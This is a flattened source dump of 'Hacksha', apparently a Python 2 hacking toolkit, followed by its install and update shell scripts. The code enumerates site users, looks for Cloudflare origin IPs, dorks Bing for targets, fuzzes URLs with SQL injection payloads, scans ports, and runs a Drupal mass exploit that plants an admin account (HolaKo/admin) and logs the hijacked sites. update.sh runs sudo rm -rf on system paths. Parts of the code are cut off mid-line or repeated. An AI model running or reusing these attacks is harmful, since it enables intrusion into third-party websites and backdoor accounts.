1221 | for site1 in self.sites: 1222 | try: 1223 | site = site1 1224 | site = site.replace('http://www.', '') 1225 | site = site.replace('http://', '') 1226 | site = site.replace('.', '') 1227 | if '-' in site: 1228 | site = site.replace('-', '') 1229 | site = site.replace('/', '') 1230 | while len(site) > 2: 1231 | resp = urllib2.urlopen( 1232 | site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read() 1233 | if 'invalid username' not in resp.lower(): 1234 | print '\t [] Found -> ', site 1235 | userslist.append(site) 1236 | break 1237 | else: 1238 | print site 1239 | 1240 | site = site[:-1] 1241 | except: 1242 | pass 1243 | 1244 | clearScr() 1245 | for user in userslist: 1246 | print user 1247 | 1248 | def cloudflareBypasser(self): 1249 | """ 1250 | trys to bypass cloudflare i already wrote 1251 | in my blog how it works, i learned this 1252 | method from a guy in madleets 1253 | """ 1254 | clearScr() 1255 | print "[~] Bypassing cloudflare" 1256 | subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel'] 1257 | for site in self.sites: 1258 | site.replace('http://', '') 1259 | site.replace('/', '') 1260 | try: 1261 | ip = socket.gethostbyname(site) 1262 | except socket.error: 1263 | pass 1264 | for sub in subdoms: 1265 | doo = sub + '.' + site 1266 | print ' [~] Trying -> ', doo 1267 | try: 1268 | ddd = socket.gethostbyname(doo) 1269 | if ddd != ip: 1270 | print ' [] Cloudflare bypassed -> ', ddd 1271 | break 1272 | except socket.error: 1273 | pass 1274 | 1275 | def getServerBanner(self): 1276 | """ 1277 | simply gets the server banner 1278 | the attacker may benefit from it 1279 | like getting the server side software 1280 | """ 1281 | clearScr() 1282 | try: 1283 | s = 'http://' + self.serverip 1284 | httpresponse = urllib.urlopen(s) 1285 | print ' [] Server header -> ', httpresponse.headers.getheader('server') 1286 | except: 1287 | pass 1288 | 1289 | def grabSqli(self): 1290 | """ 1291 | just grabs all websites in server with php?id= dork 1292 | for scanning for error based sql injection 1293 | """ 1294 | page = 1 1295 | lista = [] 1296 | while page <= 101: 1297 | try: 1298 | bing = "http://www.bing.com/search?q=ip%3A" + \ 1299 | self.serverip + "+php?id=&count=50&first=" + str(page) 1300 | openbing = urllib2.urlopen(bing) 1301 | readbing = openbing.read() 1302 | findwebs = re.findall('
<", 1323 | "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] 1324 | check = re.compile( 1325 | "Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I) 1326 | for url in s: 1327 | try: 1328 | for param in url.split('?')[1].split('&'): 1329 | for payload in payloads: 1330 | power = url.replace(param, param + payload.strip()) 1331 | 1332 | html = urllib2.urlopen(power).readlines() 1333 | for line in html: 1334 | checker = re.findall(check, line) 1335 | if len(checker) != 0: 1336 | print ' [] SQLi found -> ', power 1337 | except: 1338 | pass 1339 | 1340 | 1341 | def portScanner(self, mode, ran): 1342 | """ 1343 | simple port scanner works with range of ports 1344 | or with common ports (al-swisre idea) 1345 | """ 1346 | clearScr() 1347 | print "[~] Scanning Ports" 1348 | 1349 | def do_it(ip, port): 1350 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 1351 | 1352 | sock = sock.connect_ex((ip, port)) 1353 | if sock == 0: 1354 | print " [*] Port %i is open" % port 1355 | 1356 | if mode == 1: 1357 | a = ran.split('-') 1358 | start = int(a[0]) 1359 | end = int(a[1]) 1360 | for i in range(start, end): 1361 | do_it(self.serverip, i) 1362 | elif mode == 2: 1363 | for port in [80, 21, 22, 2082, 25, 53, 110, 443, 143]: 1364 | 1365 | do_it(self.serverip, port) 1366 | 1367 | 1368 | ############################ 1369 | minu = ''' 1370 | \t 1: Drupal Bing Exploiter 1371 | \t 2: Get Drupal Websites 1372 | \t 3: Drupal Mass Exploiter 1373 | \t 99: Back To Main Menu 1374 | ''' 1375 | 1376 | 1377 | def drupal(): 1378 | '''Drupal Exploit Binger All Websites Of server ''' 1379 | ip = raw_input('1- IP : ') 1380 | page = 1 1381 | while page <= 50: 1382 | 1383 | url = "http://www.bing.com/search?q=ip%3A" + ip + "&go=Valider&qs=n&form=QBRE&pq=ip%3A" + \ 1384 | ip + "&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first=" + \ 1385 | str(page) 1386 | req = urllib2.Request(url) 1387 | opreq = urllib2.urlopen(req).read() 1388 | findurl = re.findall( 1389 | '
" + site 1404 | 1405 | print "user:HolaKo\npass:admin" 1406 | a = open('up.txt', 'a') 1407 | a.write(site + '\n') 1408 | a.write("user:" + user + "\npass:" + pwd + "\n") 1409 | else: 1410 | print "[-] Expl Not Found :( " 1411 | 1412 | except Exception as ex: 1413 | print ex 1414 | sys.exit(0) 1415 | 1416 | # Drupal Server ExtraCtor 1417 | 1418 | 1419 | def getdrupal(): 1420 | ip = raw_input('Enter The Ip : ') 1421 | page = 1 1422 | sites = list() 1423 | while page <= 50: 1424 | 1425 | url = "http://www.bing.com/search?q=ip%3A" + ip + \ 1426 | "+node&go=Valider&qs=ds&form=QBRE&first=" + str(page) 1427 | req = urllib2.Request(url) 1428 | opreq = urllib2.urlopen(req).read() 1429 | findurl = re.findall( 1430 | '
" + url 1455 | print "[-]username:HolaKo\n[-]password:admin" 1456 | save = open('drupal.txt', 'a') 1457 | save.write( 1458 | url + "\n" + "[-]username:HolaKo\n[-]password:admin\n") 1459 | 1460 | else: 1461 | print i + "=> exploit not found " 1462 | except Exception as ex: 1463 | print ex 1464 | 1465 | 1466 | def maine(): 1467 | 1468 | print minu 1469 | choose = raw_input("choose a number : ") 1470 | while True: 1471 | 1472 | if choose == "1": 1473 | drupal() 1474 | if choose == "2": 1475 | getdrupal() 1476 | if choose == "3": 1477 | drupallist() 1478 | if choose == "4": 1479 | about() 1480 | if choose == "99": 1481 | menu() 1482 | con = raw_input('Continue [Y/n] -> ') 1483 | if con[0].upper() == 'N': 1484 | exit() 1485 | if con[0].upper() == 'Y': 1486 | maine() 1487 | 1488 | 1489 | def unique(seq): 1490 | seen = set() 1491 | return [seen.add(x) or x for x in seq if x not in seen] 1492 | 1493 | 1494 | def bing_all_grabber(s): 1495 | lista = [] 1496 | page = 1 1497 | while page <= 101: 1498 | try: 1499 | bing = "http://www.bing.com/search?q=ip%3A" + \ 1500 | s + "+&count=50&first=" + str(page) 1501 | openbing = urllib2.urlopen(bing) 1502 | readbing = openbing.read() 1503 | findwebs = re.findall('
" + sqli) 1625 | 1626 | 1627 | def sqlscan(): 1628 | ip = raw_input('Enter IP -> ') 1629 | grabsqli(ip) 1630 | 1631 | 1632 | def unique(seq): 1633 | seen = set() 1634 | return [seen.add(x) or x for x in seq if x not in seen] 1635 | 1636 | 1637 | def bing_all_grabber(s): 1638 | lista = [] 1639 | page = 1 1640 | while page <= 101: 1641 | try: 1642 | bing = "http://www.bing.com/search?q=ip%3A" + \ 1643 | s + "+&count=50&first=" + str(page) 1644 | openbing = urllib2.urlopen(bing) 1645 | readbing = openbing.read() 1646 | findwebs = re.findall('
] Press ENTER to Install Hacksha, CTRL+C to Abort.${NC}" 33 | read INPUT 34 | echo "" 35 | 36 | if [ "$PREFIX" = "/data/data/com.termux/files/usr" ]; then 37 | INSTALL_DIR="$PREFIX/usr/share/doc/Hacksha" 38 | BIN_DIR="$PREFIX/usr/bin/" 39 | pkg install -y git python2 40 | else 41 | INSTALL_DIR="/usr/share/doc/Hacksha" 42 | BIN_DIR="/usr/bin/" 43 | fi 44 | 45 | echo "[✔] Checking directories..."; 46 | if [ -d "$INSTALL_DIR" ]; then 47 | echo "[!] A Directory Hacksha Was Found.. Do You Want To Replace It ? [y/n]:" ; 48 | read shadab 49 | if [ "$shadab" = "y" ]; then 50 | rm -R "$INSTALL_DIR" 51 | else 52 | exit 53 | fi 54 | fi 55 | 56 | echo "[✔] Installing ..."; 57 | echo ""; 58 | git clone https://github.com/hackyshadab/Hacksha.git "$INSTALL_DIR"; 59 | echo "#!/bin/bash 60 | python $INSTALL_DIR/Hacksha.py" '${1+"$@"}' > Hacksha; 61 | chmod +x Hacksha; 62 | sudo cp Hacksha /usr/bin/; 63 | rm Hacksha; 64 | 65 | 66 | if [ -d "$INSTALL_DIR" ] ; 67 | then 68 | echo ""; 69 | echo "[✔] Successfuly Installed !!! [✔]"; 70 | echo ""; 71 | echo "[✔]========================================================================[✔]"; 72 | echo "[✔] ✔✔✔ All Is Done!! you can execute tool by typing Hacksha !! ✔✔✔ [✔]"; 73 | echo "[✔]========================================================================[✔]"; 74 | echo ""; 75 | else 76 | echo "[✘] Installation Failed !!! [✘]"; 77 | exit 78 | -------------------------------------------------------------------------------- /update.sh: -------------------------------------------------------------------------------- 1 | clear 2 | 3 | sudo chmod +x /etc/ 4 | 5 | clear 6 | 7 | sudo chmod +x /usr/share/doc 8 | 9 | clear 10 | 11 | sudo rm -rf /usr/share/doc/Hacksha/ 12 | 13 | clear 14 | 15 | cd /etc/ 16 | 17 | clear 18 | 19 | sudo rm -rf /etc/Shadab_the_hacker 20 | 21 | clear 22 | 23 | mkdir Shadab_the_hacker 24 | 25 | clear 26 | 27 | cd Shadab_the_hacker 28 | 29 | clear 30 | 31 | git clone https://github.com/hackyshadab/Hacksha.git 32 | 33 | clear 34 | 35 | cd Hacksha 36 | 37 | clear 38 | 39 | sudo chmod +x install.sh 40 | 41 | clear 42 | 43 | ./install.sh 44 | 45 | clear 46 | --------------------------------------------------------------------------------